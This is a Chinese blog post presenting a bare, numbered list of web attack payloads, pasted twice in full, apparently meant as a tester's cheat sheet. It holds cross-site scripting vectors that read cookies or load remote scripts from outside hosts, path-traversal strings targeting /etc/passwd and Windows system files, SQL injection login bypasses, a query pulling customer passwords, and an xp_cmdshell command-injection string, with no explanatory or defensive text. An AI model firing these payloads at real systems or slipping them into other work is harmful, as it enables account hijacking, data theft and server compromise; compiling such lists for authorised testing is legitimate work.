XSS跨站测试代码大全

最新推荐文章于 2024-06-28 07:00:00 发布
最新推荐文章于 2024-06-28 07:00:00 发布
阅读量681 收藏
点赞数
分类专栏: web安全 文章标签: XSS
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/maxushan001/article/details/79217205
版权
  1. '><script>alert(document.cookie)</script>  
  2. ='><script>alert(document.cookie)</script>  
  3. <script>alert(document.cookie)</script>  
  4. <script>alert(vulnerable)</script>  
  5. %3Cscript%3Ealert('XSS')%3C/script%3E  
  6. <script>alert('XSS')</script>  
  7. <img src="javascript:alert('XSS')">  
  8. %0a%0a<script>alert(\"Vulnerable\")</script>.jsp  
  9. %22%3cscript%3ealert(%22xss%22)%3c/script%3e  
  10. %2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd  
  11. %2E%2E/%2E%2E/%2E%2E/%2E%2E/%2E%2E/windows/win.ini  
  12. %3c/a%3e%3cscript%3ealert(%22xss%22)%3c/script%3e  
  13. %3c/title%3e%3cscript%3ealert(%22xss%22)%3c/script%3e  
  14. %3cscript%3ealert(%22xss%22)%3c/script%3e/index.html  
  15. %3f.jsp  
  16. %3f.jsp  
  17. <script>alert('Vulnerable');</script>  
  18. <script>alert('Vulnerable')</script>  
  19. ?sql_debug=1  
  20. a%5c.aspx  
  21. a.jsp/<script>alert('Vulnerable')</script>  
  22. a/  
  23. a?<script>alert('Vulnerable')</script>  
  24. "><script>alert('Vulnerable')</script>  
  25. ';exec%20master..xp_cmdshell%20'dir%20 c:%20>%20c:\inetpub\wwwroot\?.txt'--&&  
  26. %22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E  
  27. %3Cscript%3Ealert(document. domain);%3C/script%3E&  
  28. %3Cscript%3Ealert(document.domain);%3C/script%3E&SESSION_ID={SESSION_ID}&SESSION_ID=  
  29. 1%20union%20all%20select%20pass,0,0,0,0%20from%20customers%20where%20fname=  
  30. http://www.cnblogs.com/http://www.cnblogs.com/http://www.cnblogs.com/http://www.cnblogs.com/etc/passwd  
  31. ..\..\..\..\..\..\..\..\windows\system.ini  
  32. \..\..\..\..\..\..\..\..\windows\system.ini  
  33. '';!--"<XSS>=&{()}  
  34. <IMG src="javascript:alert('XSS');">  
  35. <IMG src=javascript:alert('XSS')>  
  36. <IMG src=JaVaScRiPt:alert('XSS')>  
  37. <IMG src=JaVaScRiPt:alert("XSS")>  
  38. <IMG src=javascript:alert('XSS')>  
  39. <IMG src=javascript:alert('XSS')>  
  40. <IMG src=javascript:alert('XSS')>  
  41. <IMG src="jav ascript:alert('XSS');">  
  42. <IMG src="jav ascript:alert('XSS');">  
  43. <IMG src="jav ascript:alert('XSS');">  
  44. "<IMG src=java\0script:alert(\"XSS\")>";' > out  
  45. <IMG src=" javascript:alert('XSS');">  
  46. <SCRIPT>a=/XSS/alert(a.source)</SCRIPT>  
  47. <BODY BACKGROUND="javascript:alert('XSS')">  
  48. <BODY ONLOAD=alert('XSS')>  
  49. <IMG DYNSRC="javascript:alert('XSS')">  
  50. <IMG LOWSRC="javascript:alert('XSS')">  
  51. <BGSOUND src="javascript:alert('XSS');">  
  52. <br size="&{alert('XSS')}">  
  53. <LAYER src="http://xss.ha.ckers.org/a.js"></layer>  
  54. <LINK REL="stylesheet" href="javascript:alert('XSS');">  
  55. <IMG src='vbscript:msgbox("XSS")'>  
  56. <IMG src="mocha:[code]">  
  57. <IMG src="livescript:[code]">  
  58. <META HTTP-EQUIV="refresh" CONTENT="0;url=javascript:alert('XSS');">  
  59. <IFRAME src=javascript:alert('XSS')></IFRAME>  
  60. <FRAMESET><FRAME src=javascript:alert('XSS')></FRAME></FRAMESET>  
  61. <TABLE BACKGROUND="javascript:alert('XSS')">  
  62. <DIV STYLE="background-image: url(javascript:alert('XSS'))">  
  63. <DIV STYLE="behaviour: url('http://www.how-to-hack.org/exploit.html');">  
  64. <DIV STYLE="width: expression(alert('XSS'));">  
  65. <STYLE>@im\port'\ja\vasc\ript:alert("XSS")';</STYLE>  
  66. <IMG STYLE='xss:expre\ssion(alert("XSS"))'>  
  67. <STYLE TYPE="text/javascript">alert('XSS');</STYLE>  
  68. <STYLE TYPE="text/css">.XSS{background-image:url("javascript:alert('XSS')");}</STYLE><A class="XSS"></A>  
  69. <STYLE type="text/css">BODY{background:url("javascript:alert('XSS')")}</STYLE>  
  70. <BASE href="javascript:alert('XSS');//">  
  71. getURL("javascript:alert('XSS')")  
  72. a="get";b="URL";c="javascript:";d="alert('XSS');";eval(a+b+c+d);  
  73. <XML src="javascript:alert('XSS');">  
  74. "> <BODY ONLOAD="a();"><SCRIPT>function a(){alert('XSS');}</SCRIPT><"  
  75. <SCRIPT src="http://xss.ha.ckers.org/xss.jpg"></SCRIPT>  
  76. <IMG src="javascript:alert('XSS')"  
  77. <!--#exec cmd="/bin/echo '<SCRIPT SRC'"--><!--#exec cmd="/bin/echo '=http://xss.ha.ckers.org/a.js></SCRIPT>'"-->  
  78. <IMG src="http://www.thesiteyouareon.com/somecommand.php?somevariables=maliciouscode">  
  79. <SCRIPT a=">" src="http://xss.ha.ckers.org/a.js"></SCRIPT>  
  80. <SCRIPT =">" src="http://xss.ha.ckers.org/a.js"></SCRIPT>  
  81. <SCRIPT a=">" '' src="http://xss.ha.ckers.org/a.js"></SCRIPT>  
  82. <SCRIPT "a='>'" src="http://xss.ha.ckers.org/a.js"></SCRIPT>  
  83. <SCRIPT>document.write("<SCRI");</SCRIPT>PT src="http://xss.ha.ckers.org/a.js"></SCRIPT>  
  84. <A href=http://www.gohttp://www.google.com/ogle.com/>link</A>  
  85. admin'--  
  86. ' or 0=0 --  
  87. " or 0=0 --  
  88. or 0=0 --  
  89. ' or 0=0 #  
  90. " or 0=0 #  
  91. or 0=0 #  
  92. ' or 'x'='x  
  93. " or "x"="x  
  94. ') or ('x'='x  
  95. ' or 1=1--  
  96. " or 1=1--  
  97. or 1=1--  
  98. ' or a=a--  
  99. " or "a"="a  
  100. ') or ('a'='a  
  101. ") or ("a"="a  
  102. hi" or "a"="a  
  103. hi" or 1=1 --  
  104. hi' or 1=1 --  
  105. hi' or 'a'='a  
  106. hi') or ('a'='a  
  107. hi") or ("a"="a[/code]'><script>alert(document.cookie)</script>  
  108. ='><script>alert(document.cookie)</script>  
  109. <script>alert(document.cookie)</script>  
  110. <script>alert(vulnerable)</script>  
  111. %3Cscript%3Ealert('XSS')%3C/script%3E  
  112. <script>alert('XSS')</script>  
  113. <img src="javascript:alert('XSS')">  
  114. %0a%0a<script>alert(\"Vulnerable\")</script>.jsp  
  115. %22%3cscript%3ealert(%22xss%22)%3c/script%3e  
  116. %2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd  
  117. %2E%2E/%2E%2E/%2E%2E/%2E%2E/%2E%2E/windows/win.ini  
  118. %3c/a%3e%3cscript%3ealert(%22xss%22)%3c/script%3e  
  119. %3c/title%3e%3cscript%3ealert(%22xss%22)%3c/script%3e  
  120. %3cscript%3ealert(%22xss%22)%3c/script%3e/index.html  
  121. %3f.jsp  
  122. %3f.jsp  
  123. <script>alert('Vulnerable');</script>  
  124. <script>alert('Vulnerable')</script>  
  125. ?sql_debug=1  
  126. a%5c.aspx  
  127. a.jsp/<script>alert('Vulnerable')</script>  
  128. a/  
  129. a?<script>alert('Vulnerable')</script>  
  130. "><script>alert('Vulnerable')</script>  
  131. ';exec%20master..xp_cmdshell%20'dir%20 c:%20>%20c:\inetpub\wwwroot\?.txt'--&&  
  132. %22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E  
  133. %3Cscript%3Ealert(document. domain);%3C/script%3E&  
  134. %3Cscript%3Ealert(document.domain);%3C/script%3E&SESSION_ID={SESSION_ID}&SESSION_ID=  
  135. 1%20union%20all%20select%20pass,0,0,0,0%20from%20customers%20where%20fname=  
  136. http://www.cnblogs.com/http://www.cnblogs.com/http://www.cnblogs.com/http://www.cnblogs.com/etc/passwd  
  137. ..\..\..\..\..\..\..\..\windows\system.ini  
  138. \..\..\..\..\..\..\..\..\windows\system.ini  
  139. '';!--"<XSS>=&{()}  
  140. <IMG src="javascript:alert('XSS');">  
  141. <IMG src=javascript:alert('XSS')>  
  142. <IMG src=JaVaScRiPt:alert('XSS')>  
  143. <IMG src=JaVaScRiPt:alert("XSS")>  
  144. <IMG src=javascript:alert('XSS')>  
  145. <IMG src=javascript:alert('XSS')>  
  146. <IMG src=javascript:alert('XSS')>  
  147. <IMG src="jav ascript:alert('XSS');">  
  148. <IMG src="jav ascript:alert('XSS');">  
  149. <IMG src="jav ascript:alert('XSS');">  
  150. "<IMG src=java\0script:alert(\"XSS\")>";' > out  
  151. <IMG src=" javascript:alert('XSS');">  
  152. <SCRIPT>a=/XSS/alert(a.source)</SCRIPT>  
  153. <BODY BACKGROUND="javascript:alert('XSS')">  
  154. <BODY ONLOAD=alert('XSS')>  
  155. <IMG DYNSRC="javascript:alert('XSS')">  
  156. <IMG LOWSRC="javascript:alert('XSS')">  
  157. <BGSOUND src="javascript:alert('XSS');">  
  158. <br size="&{alert('XSS')}">  
  159. <LAYER src="http://xss.ha.ckers.org/a.js"></layer>  
  160. <LINK REL="stylesheet" href="javascript:alert('XSS');">  
  161. <IMG src='vbscript:msgbox("XSS")'>  
  162. <IMG src="mocha:[code]">  
  163. <IMG src="livescript:[code]">  
  164. <META HTTP-EQUIV="refresh" CONTENT="0;url=javascript:alert('XSS');">  
  165. <IFRAME src=javascript:alert('XSS')></IFRAME>  
  166. <FRAMESET><FRAME src=javascript:alert('XSS')></FRAME></FRAMESET>  
  167. <TABLE BACKGROUND="javascript:alert('XSS')">  
  168. <DIV STYLE="background-image: url(javascript:alert('XSS'))">  
  169. <DIV STYLE="behaviour: url('http://www.how-to-hack.org/exploit.html');">  
  170. <DIV STYLE="width: expression(alert('XSS'));">  
  171. <STYLE>@im\port'\ja\vasc\ript:alert("XSS")';</STYLE>  
  172. <IMG STYLE='xss:expre\ssion(alert("XSS"))'>  
  173. <STYLE TYPE="text/javascript">alert('XSS');</STYLE>  
  174. <STYLE TYPE="text/css">.XSS{background-image:url("javascript:alert('XSS')");}</STYLE><A class="XSS"></A>  
  175. <STYLE type="text/css">BODY{background:url("javascript:alert('XSS')")}</STYLE>  
  176. <BASE href="javascript:alert('XSS');//">  
  177. getURL("javascript:alert('XSS')")  
  178. a="get";b="URL";c="javascript:";d="alert('XSS');";eval(a+b+c+d);  
  179. <XML src="javascript:alert('XSS');">  
  180. "> <BODY ONLOAD="a();"><SCRIPT>function a(){alert('XSS');}</SCRIPT><"  
  181. <SCRIPT src="http://xss.ha.ckers.org/xss.jpg"></SCRIPT>  
  182. <IMG src="javascript:alert('XSS')"  
  183. <!--#exec cmd="/bin/echo '<SCRIPT SRC'"--><!--#exec cmd="/bin/echo '=http://xss.ha.ckers.org/a.js></SCRIPT>'"-->  
  184. <IMG src="http://www.thesiteyouareon.com/somecommand.php?somevariables=maliciouscode">  
  185. <SCRIPT a=">" src="http://xss.ha.ckers.org/a.js"></SCRIPT>  
  186. <SCRIPT =">" src="http://xss.ha.ckers.org/a.js"></SCRIPT>  
  187. <SCRIPT a=">" '' src="http://xss.ha.ckers.org/a.js"></SCRIPT>  
  188. <SCRIPT "a='>'" src="http://xss.ha.ckers.org/a.js"></SCRIPT>  
  189. <SCRIPT>document.write("<SCRI");</SCRIPT>PT src="http://xss.ha.ckers.org/a.js"></SCRIPT>  
  190. <A href=http://www.gohttp://www.google.com/ogle.com/>link</A>  
  191. admin'--  
  192. ' or 0=0 --  
  193. " or 0=0 --  
  194. or 0=0 --  
  195. ' or 0=0 #  
  196. " or 0=0 #  
  197. or 0=0 #  
  198. ' or 'x'='x  
  199. " or "x"="x  
  200. ') or ('x'='x  
  201. ' or 1=1--  
  202. " or 1=1--  
  203. or 1=1--  
  204. ' or a=a--  
  205. " or "a"="a  
  206. ') or ('a'='a  
  207. ") or ("a"="a  
  208. hi" or "a"="a  
  209. hi" or 1=1 --  
  210. hi' or 1=1 --  
  211. hi' or 'a'='a  
  212. hi') or ('a'='a  
  213. hi") or ("a"="a  
夏侯羽
关注
专栏目录
XSS测试代码大全————
11-03
XSS测试代码 安全测试 XSS测试代码大全
开发代码安全规范防SQL注入和XSS跨站攻击代码编写规范样本.doc
08-04
开发代码安全规范防SQL注入和XSS跨站攻击代码编写规范样本 随着技术的高速发展,Web应用被广泛使用,但同时也伴随着各种安全隐患。为了提高编程人员的安全意识和安全编程经验,本规范提供了防止SQL注入和XSS跨站...
XSS测试代码大全
热门推荐
夕慕慕的博客
11-14 1万+
XSS测试代码大全 主要根据各种脚本及标签,将之转换成Unicode编码后输入。 '>alert(document.cookie) ='>alert(document.cookie) alert(document.cookie) alert(vulnerable) %3Cscript%3Ealert('XSS')%3C/script%3E alert('XSS') %0a
XSS跨站攻击代码大全
最新发布
愿听风成曲
06-28 370
img src=""onerror=“alert(‘xss’)”> 直接k掉script绕过。包含alert就绕过(括号一串数字是alert(xss)的ASCII值)'“>ipt> 过滤script绕过。Referer: '"> 传送头插入。过chrome默认xss过滤器。通过构造一个带xss的锚点绕过。
xss测试代码
weixin_34258782的博客
02-13 128
‘><script>alert(document.cookie)</script>=’><script>alert(document.cookie)</script><script>alert(document.cookie)</script><script>alert(vulnerable)</...
XSS测试代码
abg49988的博客
03-27 345
无script的Xss <img/src=# onerror=alert('XSS')> HTML5 XSS测试代码 <video> <source onerror=”javascript:alert(1)”> 引入媒体类测试代码Example: <video onerror=”javascript:alert...
开发代码安全规范-防SQL注入和XSS跨站攻击代码编写规范.pdf
07-14
【开发代码安全规范-防SQL注入和XSS跨站攻击】是针对互联网应用程序开发中的重要安全问题,旨在提升开发人员的安全编程意识,防止恶意攻击对系统和数据的破坏。SQL注入和XSS跨站脚本攻击是两种常见的网络安全威胁。 ...
xss跨站脚本攻击-运维安全详细笔记
06-30
xss跨站脚本攻击是指攻击者利用网站没有对用户提交代码进行转义处理或者过滤不足的缺点,进而添加一些新代码,嵌入到Web页面中,使得其他用户访问都会执行相应的嵌入代码,从而盗取用户资料,利用用户身份进行某些...
开发代码安全规范-防SQL注入和XSS跨站攻击代码编写规范.docx
07-14
开发代码安全规范旨在确保软件开发过程中对SQL注入和XSS跨站攻击的防范,这是互联网应用开发中的两个重要安全问题。以下是对这两个安全威胁的详细解释以及对应的代码编写规范: **SQL注入** 是一种常见的攻击手段,...
ThinkPHP2.x防范XSS跨站攻击的方法
12-19
XSS(Cross-Site Scripting)跨站脚本攻击是一种常见的网络安全漏洞,它允许攻击者在用户浏览器上执行恶意脚本。在ThinkPHP2.x框架中,存在一个可能导致XSS攻击的风险,即当URL参数中包含恶意脚本时,ThinkPHP的异常...
xss测试代码大全javascript中的xss过滤
03-24
xss测试代码大全
XSS跨站攻击,注入代码整理,大全
03-03
XSS跨站攻击,注入代码整理,希望大家支持
XSS攻击检测
01-22
XSS攻击检测代码,删除bin生成的class,直接使用src加载.java 就好了,开发采用的myeclipse,使用其他工具的注意修改,
代码审计--XSS跨站测试代码大全
对代码不满足,是任何真正有天才的程序员的根本特征。
12-22 1619
代码审计之----------XSS XSS又叫CSS (Cross Site Script) ,跨站脚本攻击。它指的是恶意攻击者往web页面里插入恶意html代码,当用户浏览该页之时,嵌入其中Web里面的html代码会被执行,从而达到恶意用户的特殊目的。   '>alert(document.cookie) ='>alert(document.cookie) alert(docum
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值